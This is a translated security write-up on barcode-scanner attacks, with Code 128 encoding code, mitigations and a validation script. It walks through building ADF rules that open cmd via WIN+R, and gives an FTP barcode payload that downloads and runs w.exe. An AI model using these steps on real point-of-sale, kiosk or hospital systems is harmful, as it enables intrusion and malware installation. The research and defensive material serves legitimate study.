Barcode attack technique (Badbarcode)

Barcode attack technique (Badbarcode) - Drops

virustracker

Author: 数据流 @ 伏宸安全实验室
From: http://drops.wooyun.org/tips/12183


Barcodes are everywhere in daily life, especially in supermarkets, convenience stores and the logistics industry. But are they safe? The barcode attack that @Tk described at PacSec, with the demo video he posted on Twitter, was so cool that I bought a scanner to research it myself. During my research I went through all the material I could find, at home and abroad, but none of it covers the possible attack techniques. So here is one.



A barcode is a graphic identifier that represents a piece of information through the widths and spacing of a set of parallel lines. A common barcode is a row of black bars (bars) and white bars (spaces) of different reflectivity.

Common symbologies are Code 39, Code 128, Code 93, EAN-128, EAN-13 and QR, among others. All of these are one-dimensional except QR, which is two-dimensional; this post focuses on one-dimensional scanners. Code 128 is the most widely used and supports the largest character set, so these attacks normally use Code 128 barcodes.



Almost everyone has seen a barcode scanner in a supermarket, a logistics depot, a hospital or a lottery shop. A scanner reads the information in a barcode: a conventional one illuminates the bars with a laser or LED, and its embedded decoder chip processes the reflected pattern and outputs the result. Popular scanner brands worldwide include Symbol, Honeywell and Datalogic; Symbol was acquired by Motorola (and is now part of Zebra).

You will notice that when you pay at a supermarket, the product code appears on the screen as soon as the item is scanned. Many scanners deliver their output as keyboard input: to the host, a scanner in this mode is simply a keyboard (a USB HID or PS/2 "keyboard wedge"), and the host cannot tell a scan from keystrokes typed by a person. That is the core risk.



Since a scanner is a keyboard, any keyboard input can be injected by controlling the data in a barcode. The symbology matters, though: UPC only carries digits and some symbologies carry digits and letters, while Code 128 is widely used precisely because it carries all 128 ASCII characters (0-127), which is where its name comes from. The length of a barcode is adjustable; the original post gives 232 characters as the practical maximum, and in any case the limit is set by the scanner and the print width rather than by the symbology.

Code 128 has three code sets:

  1. Code 128A: digits, uppercase letters, punctuation and the ASCII control characters (0-31).
  2. Code 128B: digits, uppercase and lowercase letters and punctuation (ASCII 32-127), but no control characters.
  3. Code 128C: pairs of digits from 00 to 99 (100 values), so it can only encode digit strings of even length. EAN-128 (GS1-128) is an application standard built on Code 128 and usually uses set C for its numeric data.

A Code 128 symbol consists of four parts: a start character, the data characters, a check character and a stop character. The check character is computed modulo 103 and is mandatory in the specification: a scanner will not report a symbol whose check character does not match, so any hand-built barcode has to compute it.


As shown above, a barcode is a run of bars and spaces of varying widths. Measured in units (modules), the pattern at the left reads 211214: the first bar is two modules wide, the following space one module, the next bar one module, and so on. Every Code 128 character is made of three bars and three spaces, so six widths form one character (11 modules in total). Writing each bar module as 1 and each space module as 0, 211214 becomes 11010010000, which is the Start B character.

The three start characters compared:

  • Start A: 211412, i.e. 11010000100
  • Start B: 211214, i.e. 11010010000
  • Start C: 211232, i.e. 11010011100

The stop character is always 2331112, i.e. 1100011101011 (13 modules, the only pattern with seven elements).

Since this barcode begins with 11010010000, it is a Code 128B symbol.

The remaining characters are read off the Code 128 encoding table in the same way, six widths per character; after the check character is verified against the data, the encoded text is recovered.
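The procedure above, carried through in code: an added example, not code from the original post. It encodes text such as "FutureSec" followed by ASCII 0x0F (the character a keyboard-wedge scanner types as Ctrl+O) into the same width notation the article uses, computes the modulo-103 check character, expands widths to the 1/0 module string, and parses a width string back to text while verifying start, check and stop. Code sets A and B are generated, with SHIFT for a single control character and CODE_A/CODE_B to latch; set C is handled on the decoding side only.

```python
"""Code 128 encoder/decoder in the width notation used above (e.g. 211214).
Added example, not code from the original post: encodes text such as
"FutureSec" plus ASCII 0x0F (typed as Ctrl+O by a keyboard-wedge scanner),
computes the modulo-103 check character and parses a width string back."""

# Patterns for values 0..105 then STOP, as widths of bar,space,bar,space,bar,
# space in modules; every character is 11 modules wide, STOP is 13.
PATTERNS = (
    "212222 222122 222221 121223 121322 131222 122213 122312 132212 221213 "
    "221312 231212 112232 122132 122231 113222 123122 123221 223211 221132 "
    "221231 213212 223112 312131 311222 321122 321221 312212 322112 322211 "
    "212123 212321 232121 111323 131123 131321 112313 132113 132311 211313 "
    "231113 231311 112133 112331 132131 113123 113321 133121 313121 211331 "
    "231131 213113 213311 213131 311123 311321 331121 312113 312311 332111 "
    "314111 221411 431111 111224 111422 121124 121421 141122 141221 112214 "
    "112412 122114 122411 142112 142211 241211 221114 413111 241112 134111 "
    "111242 121142 121241 114212 124112 124211 411212 421112 421211 212141 "
    "214121 412121 111143 111341 131141 114113 114311 411113 411311 113141 "
    "114131 311141 411131 211412 211214 211232 2331112"
).split()
STOP = PATTERNS[106]                        # 2331112 -> 1100011101011
VALUE_OF = {p: i for i, p in enumerate(PATTERNS[:106])}
SHIFT, CODE_C, CODE_B, CODE_A = 98, 99, 100, 101   # meaning depends on the set
START_A, START_B, START_C = 103, 104, 105


def value_in(ch, cs):
    """Symbol value of ch in code set A or B, or None if not encodable there."""
    o = ord(ch)
    if cs == "A" and o < 32:
        return o + 64                           # control characters sit at 64..95
    return o - 32 if 32 <= o <= (95 if cs == "A" else 127) else None


def checksum(values):
    """Check character for [start, data...]: (start + sum(i * v_i)) mod 103."""
    return (values[0] + sum(i * v for i, v in enumerate(values[1:], 1))) % 103


def encode(text, start="B"):
    """[start, data..., check] using sets A/B: SHIFT for a one-off character
    from the other set, CODE_A/CODE_B to latch when the excursion is longer."""
    cur = start
    values = [START_A if cur == "A" else START_B]
    for i, ch in enumerate(text):
        v = value_in(ch, cur)
        if v is None:
            other = "A" if cur == "B" else "B"
            if value_in(ch, other) is None:
                raise ValueError("cannot encode %r in Code 128 A/B" % ch)
            nxt = text[i + 1:i + 2]
            if not nxt or value_in(nxt, cur) is not None:
                values += [SHIFT, value_in(ch, other)]
                continue
            values.append(CODE_A if other == "A" else CODE_B)
            cur, v = other, value_in(ch, other)
        values.append(v)
    values.append(checksum(values))
    return values


def to_widths(values):
    """Width string for a complete symbol (values already ends with the check)."""
    return "".join(PATTERNS[v] for v in values) + STOP


def to_bits(widths):
    """Expand widths to modules: bars are 1, spaces are 0, starting with a bar."""
    return "".join(("1" if i % 2 == 0 else "0") * int(w) for i, w in enumerate(widths))


def decode_widths(widths):
    """Parse a width string back to text, verifying start, check and stop."""
    if not widths.endswith(STOP) or (len(widths) - len(STOP)) % 6:
        raise ValueError("malformed symbol")
    body = widths[:-len(STOP)]
    vals = [VALUE_OF.get(body[i:i + 6]) for i in range(0, len(body), 6)]
    if len(vals) < 2 or None in vals or vals[0] not in (START_A, START_B, START_C):
        raise ValueError("unknown pattern or bad start character")
    if checksum(vals[:-1]) != vals[-1]:
        raise ValueError("check character mismatch")
    cs = {START_A: "A", START_B: "B", START_C: "C"}[vals[0]]
    out, shift = [], None
    for v in vals[1:-1]:
        s, shift = shift or cs, None            # SHIFT applies to one character
        if s == "C":                             # digit pairs or a switch out of C
            if v < 100:
                out.append("%02d" % v)
            else:
                cs = {CODE_B: "B", CODE_A: "A"}.get(v, cs)   # 102 is FNC1
        elif v == SHIFT:
            shift = "A" if s == "B" else "B"
        elif v == CODE_C:
            cs = "C"
        elif (v, s) in ((CODE_B, "A"), (CODE_A, "B")):
            cs = "B" if s == "A" else "A"
        elif v < 96:                             # 96..102 are FNC1-4 otherwise
            out.append(chr(v - 64) if s == "A" and v >= 64 else chr(v + 32))
    return "".join(out)


if __name__ == "__main__":
    vals = encode("FutureSec\x0f")               # ends in SHIFT, SI (79), check 42
    print(vals, to_widths(vals), repr(decode_widths(to_widths(vals))))
```

The first six widths of the generated symbol are 211214 (Start B) and the bit string begins 11010010000, matching the worked reading above; the control character is reached through SHIFT into set A because set B has no control characters. Changing any one data character makes decode_widths reject the symbol on the check character, which is why a hand-made payload has to recompute it rather than copy one from another barcode.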


With the Code 128 rules above you can write a program that reads and generates barcodes yourself. Our purpose, however, is to make the host perform actions, and the simplest way is control characters: the non-printing characters such as carriage return, line feed and tab. In ASCII, 0-31 and 127 are control characters.

Looking at the ASCII control character table, almost every Ctrl+letter combination is covered, because a scanner in keyboard-wedge mode types a control character as the corresponding Ctrl+key (0x0F is Ctrl+O, for example). Ctrl+O opens a file, but that is only an application-level shortcut that works in particular programs, such as a browser or MS Word. Some control characters are also interpreted by terminals, which can be enough to break a program out of its sandbox or kiosk. So how do we generate a barcode that makes the computer execute Ctrl+O? The Code 128 algorithm above is enough to write your own generator, and there are many small barcode generators on the Internet as well. Here I recommend a powerful barcode editor: BarTender.

After installation, click File > New > Finish and you get a blank template.

Then click the barcode button to create a barcode and select Code 128.

Use BarTender to generate the barcode; the characters can be edited and debugged at any time. When the barcode above is scanned, the scanner types "FutureSec" followed by Ctrl+O.

After the scan, the Open dialog pops up immediately.

Almost every scanner can do this, because Code 128 is supported by virtually all scanners and keyboard emulation is the default host interface.


Advanced Data Formatting (ADF) is Motorola's mechanism for programming a scanner with rules that rewrite the scanned data, step by step, before it is sent to the host. It is best viewed as a barcode-driven programming language.

For instance, a checkout system may be unable to process a barcode directly, in which case ADF is used. Say the checkout system expects an identifier of the form A12345, starting with an A, but the barcode holds only the digits 12345: ADF prepends the A so that the checkout system recognises the input.

Here is another example:

Barcode data:

8523647122

Output data from ADF:

8523641

How is ADF implemented?

There are no Chinese materials about ADF on the Internet, and only a few appear on English websites. You will also be confused by @TK's introduction to ADF in his slides, because it lacks details. Later, I found a 300-page ADF guide from Motorola.

ADF is a programming method: you build the logic you need, but using barcodes instead of source code. Every element of a rule is represented by a barcode: prefix/suffix, replacement, character input, and so on.

Use ADF to hijack data of a scanner

Before setting up ADF on the scanner, scan the programming-mode barcode first: Begin New Rule.

From then on, every barcode scanned is appended to the rule, as long as the rule logic stays legal.

Next, scan the following barcodes in order (the criteria and the actions of the rule).

Then scan Save Rule.

Once the rule is saved, every scan has its output hijacked: the scanner sends "TEST" regardless of what was scanned. With ADF set, the rule executes step by step on every scan.

How to recover it?

Scan Erase All Rules to remove every rule.


Control characters alone are enough to run a command, and ADF adds simple programming and more keys, so executing system commands through ADF is easy. The most useful of the extra keys is WIN+R.

ADF calls it GUI R. With WIN+R available, the rule above launches cmd. That is not enough on its own, because the scanner injects keystrokes faster than a human types: after GUI R, the "c", "m", "d" arrive before the Run dialog has opened and are lost. A delay is therefore required, and ADF supports one, equivalent to sleep() in a program.

When entering the pause in an ADF rule, two numeric barcodes set the delay in tenths of a second: 0 and 1 gives 0.1 s, 0 and 5 gives 0.5 s; the default is 1 second.

With these ADF barcodes you can construct a cmd popup and use control characters, mainly Enter, to execute commands. Done as described above, though, popping a cmd box takes about 10 barcodes, so the scanner has to be presented with 10 barcodes in sequence. Here is a demo from Tencent Xuanwu Lab:

https://twitter.com/tombkeeper/status/663730674017300480

In the video, a pile of barcodes is scanned ten times in sequence to get a cmd. The exact number probably depends on the scanner model.

Done that way, both building the rule and exploiting it are troublesome. In fact this can be optimized: Motorola's scanner software 123Scan can combine the ADF rules into a handful of barcodes.

123Scan is Motorola's powerful scanner management software, available from its official website, and supports many functions. The next part shows how to set up ADF with 123Scan.

Open it and click "Create new configuration file"->"My scanner is NOT connected”->select scanner->"Modify data"->"Program complex data modifications"->"Create a new rule”.

Click Add action to add an action to the rule.

All ADF actions are available, including beep control (the scanner's buzzer), replace, and so on.

Set a 0.5 s delay and add the actions in order.

Finally, 123Scan combines everything automatically and outputs the programming barcodes.

These barcodes are the payload used to execute arbitrary commands. Apart from the first (restore factory defaults) and the second (erase all rules), only 4 barcodes are needed to execute any single command. "Send all that remains" sends the original scanned data once the preceding actions have run. The ADF process for the 4 barcodes is: send WIN+R -> pause 0.5 s -> send c -> send m -> send d -> send Enter -> pause 0.5 s -> send the content of the scanned barcode. So after programming, whatever barcode is scanned becomes the command that is executed, and the "Send all that remains" step is what lets a multi-line command be carried in a barcode. For a single-line command, 4 barcodes are enough and "Send all that remains" is not required.

Use ADF to plant malware

Since cmd commands can now be executed, the simplest way is to use ftp to download and run an arbitrary executable. The "Send all that remains" data, the barcode scanned after the ADF rule is in place, can be generated with BarTender and carry the FTP commands:

ftp test«CR»a«CR»a«CR»get w.exe«CR»bye«CR»w.exe«CR»get w.exe«CR»bye«CR»w.exe«CR»

Here «CR» is a carriage return (Enter): connect to the host named test, log in as user a with password a, fetch w.exe, leave ftp and run w.exe (the get/bye/run sequence is repeated in the payload).

Next is our demo video. The ADF settings are scanned 4 times, after which whatever barcode is scanned is executed through "Send all that remains"; the video shows the FTP commands being executed.

(Tested model: Symbol-LS4208-SR20001ZZR)

http://v.youku.com/v_show/id_XMTQ0ODY0ODg1Ng==.html?from=y1.7-1.2

Password: wooyun520


Next is a summary of the possible attack scenarios:

1. Paying a bill

Swap the barcode on one product for another's. Many convenience stores accept WeChat Pay and Alipay barcodes; the scanner supports multiple symbologies and reads barcodes shown on a phone screen. Some supermarkets also have price-check terminals, and scanning a crafted barcode on such a terminal lets you break out of its kiosk application.

2. Hospital records and test lists

Nowadays a hospital registration slip and the medical record both carry a barcode. Self-service terminals in the hospital accept the barcode, or you hand it to a nurse. Almost every hospital has terminals that generate a test list by scanning the barcode.

3. Lottery tickets

Lottery tickets carry barcodes, and the checking machine relies on the barcode to identify the ticket. So it is possible to forge tickets or attack the checking machine, and there are many types of lottery terminal.

4. Express delivery labels

Express delivery labels also use barcodes, normally Code 128 or Code 39. Some self-service parcel lockers may be at risk.

There are many other scenarios that I won't list here. If possible, I'll analyse each scenario another time.


  1. Disable the scanner's ADF function by default, and leave it disabled unless a rule is actually needed.
  2. Avoid keyboard emulation: read scans over serial, USB-COM or a POS API such as OPOS, so the application receives a string rather than keystrokes and no control character or GUI key can reach the operating system.
  3. Set up a hotkey blacklist: filter control characters and GUI/function-key combinations out of scanner input before it reaches anything that acts on it.
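The second and third measures together, as a host-side check (an added example, not code from the original post; the label formats it accepts are assumptions for the example): the application that receives a scan strips the scanner's terminator, refuses anything that still contains a control character, and accepts only data matching a label format it expects, here an EAN-13 with a valid check digit or an alphanumeric shipment ID.

```python
"""Host-side validation of scanned input (added example, not from the post).

A scan is accepted only if, after the scanner's terminator is removed, it is
printable ASCII and matches one of the label formats this scan point expects.
Anything else, including the control characters and GUI-key sequences that a
Badbarcode payload relies on, is rejected and can be logged as an incident.
"""
import re

MAX_LEN = 64                     # longer than any label this point should see


def ean13_ok(s):
    """EAN-13 (and 13-digit UPC) check digit: weights 1,3,1,3,... over the
    first 12 digits, check = (10 - sum mod 10) mod 10."""
    if not re.fullmatch(r"\d{13}", s):
        return False
    d = [int(c) for c in s]
    total = sum(x * (3 if i % 2 else 1) for i, x in enumerate(d[:12]))
    return (10 - total % 10) % 10 == d[12]


# Label formats this scan point accepts (assumed for the example): retail
# EAN-13 codes and an alphanumeric Code 128 shipment ID. A real deployment
# lists exactly its own formats and nothing else.
FORMATS = (
    ("ean13", re.compile(r"\d{13}"), ean13_ok),
    ("shipment", re.compile(r"[A-Z0-9]{10,34}"), None),
)


def validate_scan(raw):
    """Return (format_name, data) for an accepted scan or ('rejected', reason)."""
    if len(raw) > MAX_LEN:
        return "rejected", "too long"
    data = raw
    for term in ("\r\n", "\r", "\n"):     # scanners append one terminator
        if data.endswith(term):
            data = data[:-len(term)]
            break
    if re.search(r"[^\x20-\x7e]", data):  # any remaining control/non-ASCII byte
        return "rejected", "control or non-printable character in scan"
    for name, shape, extra in FORMATS:
        if shape.fullmatch(data):
            if extra is not None and not extra(data):
                return "rejected", "%s check digit failed" % name
            return name, data
    return "rejected", "does not match any expected label format"


if __name__ == "__main__":
    # Constructed sample scans: a valid EAN-13, a tampered one, a shipment
    # ID, the Ctrl+O barcode from above, and an ADF-style cmd payload.
    for raw in ("4006381333931\r", "4006381333932\r", "1Z999AA10123456784\r",
                "FutureSec\x0f\r", "cmd\rcalc\r"):
        print(repr(raw), "->", validate_scan(raw))
```

The check only helps where the application can see the raw scan, which is the point of measure 2: in keyboard-wedge mode the operating system has already acted on WIN+R or Ctrl+O before any application code runs, so no filter in the application can stop it. Allowing a single trailing CR or LF and nothing else inside the data is the practical compromise, since most scanners are configured to send Enter as a suffix.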

The idea of attacking through barcodes was raised years ago, but nobody dug deep. Barcodes carrying crafted data can also deliver SQL injection, XSS and overflow payloads to the application that processes the scan.

Whatever the device is, once part of the input can be manipulated, it is risky.


 

 
